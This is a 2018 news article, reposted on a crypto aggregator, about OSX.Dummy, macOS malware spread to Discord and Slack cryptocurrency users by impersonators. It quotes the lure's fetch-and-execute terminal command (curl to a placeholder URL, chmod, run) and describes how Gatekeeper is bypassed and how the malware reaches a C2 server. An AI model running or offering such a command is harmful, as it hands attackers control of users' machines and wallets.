Skip to content

Blockchain News Feed

All the latest news on Blockchain & Cryptocurrencies

Menu
  • Home
  • News
  • Exchanges
  • Market Analysis
  • YouTube
  • Brave Browser
Menu

Discord and Slack Cryptocurrency Users Hit by Malicious “Cryptojacking” Software

Posted on juli 2, 2018 by Blockchain News
Discord And Slack Cryptocurrency Users Hit By Malicious Cryptojacking Software

Hackers have allegedly targeted cryptocurrency-focused groups on workplace-emulator Slack and gaming-forum Discord for discussing cryptocurrencies to infiltrate computers with “cryptojacking” software.

Discord and Slack Users Affected

Identified as OSX.Dummy, the MacOS-based malware is not as sophisticated as other masterfully-written hacking code, yet allows “arbitrary code execution on machines that it can get embedded into.”

As stated, researchers from cybersecurity consortium Unix found evidence of the OSX.Dummy, with Remco Verhoef of SANS’ InfoSec confirming a series of malicious attacks on macOS Slack applications on June 30, 2018.

Reportedly, several chatrooms on Discord and Slack have raised issues with system administrators about people who impersonate influential group members and send an unsuspecting link to a “useful” cryptocurrency mobile app.

The Malicious Code

On installing, the app downloads and executes the binary script “cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script.” The script is a 34 MB file and contains the OSX.Dummy software.

The script is a “regular” mach064 binary and executes itself on a MacOs system. Due to its obscurity, online malware scanners and inbuilt antivirus software fail to recognize the code as a threat.

Usually, the unsigned binary OSX.Dummy file cannot run on an OS due to defined security protocol. However, macOS security subroutine, “Gatekeeper,” does not check files that have been exclusively downloaded by the user and run in a system terminal, which notably, is the only way to run the “helpful” software.

Subsequently, the software prompts users to enter their master password, which provides the unauthorized code access to all underlying data, features, and password of the victim system. As a final step, the victim computer automatically connects to a C2 server, giving the attackers full access to the machine.

As the victim was from a cryptocurrency-related forum, this process provides attackers direct access to private addresses, emails, passwords, and security keys of the user, proving to be a basic yet effective “cryptojacking” process.

The new cyber threat of Cryptojacking is loosely defined as hackers infiltrating a victim’s computer to use their processing power to mine cryptocurrencies. However, the relatively low security measures exercised by businesses and users alike make the cryptocurrency sector a soft and highly profitable target. As reported by BTCManager in June 2018, the illicit activity of mining cryptocurrencies from a victim computer has surged by 629 percent in 2018 alone, with attackers showing no signs of stopping any time soon.

The post Discord and Slack Cryptocurrency Users Hit by Malicious “Cryptojacking” Software appeared first on BTCMANAGER.


Source: BTCManager.com
Original Post: Discord and Slack Cryptocurrency Users Hit by Malicious “Cryptojacking” Software

Ledger Nano X - The secure hardware wallet

Recente berichten

  • Potential BULLISH DOT Divergence | Polkadot Price Prediction
  • A NEW Coin Making BIG NEWS + The NEXT El Salvador? & This Would NORMALLY Be MAJOR News
  • Blockchain Analytics Firm Kaiko Raises $53M Series B Led by Eight Roads Amid Bear Market
  • Terra Classic spiked 17.63% in last 24-hour; reason might comfort you
  • Harmony Attacker Moves Over $44M Worth of Stolen Ether, Authorities Alerted

Categorieën

  • Altcoin Buzz
  • Altcoin Buzz News
  • AMBcrypto
  • Bitcoin.com
  • Bitcoinist
  • BTC Manager
  • CCN
  • Coin Mastery
  • Coindesk
  • Coinpower News
  • Cointelegraph
  • CryproSlate
  • Crypto Daily
  • Crypto News (.net)
  • Cryptocoin News
  • Cryptocurrency News
  • CryptoDaily.co.uk
  • CryptoPotato
  • CryptosRUs
  • Daily HODL
  • DataDash
  • Ethereum Worldnews
  • Exchanges
  • ICO's
  • Invest in Blockchain
  • Market Analysis
  • News
  • News BTC
  • Newsbit
  • Portfolio
  • Pricecheck
  • Ready Set Crypto
  • The Modern Investor
  • ToshiTimes
  • Use The Bitcoin

Archieven

  • juni 2022
  • mei 2022
  • april 2022
  • maart 2022
  • februari 2022
  • januari 2022
  • december 2021
  • november 2021
  • oktober 2021
  • september 2021
  • augustus 2021
  • juli 2021
  • juni 2021
  • mei 2021
  • april 2021
  • maart 2021
  • februari 2021
  • januari 2021
  • december 2020
  • november 2020
  • oktober 2020
  • september 2020
  • augustus 2020
  • juli 2020
  • juni 2020
  • mei 2020
  • april 2020
  • maart 2020
  • februari 2020
  • januari 2020
  • december 2019
  • november 2019
  • oktober 2019
  • september 2019
  • augustus 2019
  • juli 2019
  • juni 2019
  • mei 2019
  • april 2019
  • maart 2019
  • februari 2019
  • januari 2019
  • december 2018
  • november 2018
  • oktober 2018
  • september 2018
  • augustus 2018
  • juli 2018
  • juni 2018
  • mei 2018
  • april 2018
  • maart 2018
  • februari 2018
  • januari 2018
  • december 2017
  • november 2017
  • oktober 2017
  • september 2017
  • maart 2017
  • juni 2016
  • juli 2014
  • september 2013
  • augustus 2013
©2022 Blockchain News Feed | Design: Newspaperly WordPress Theme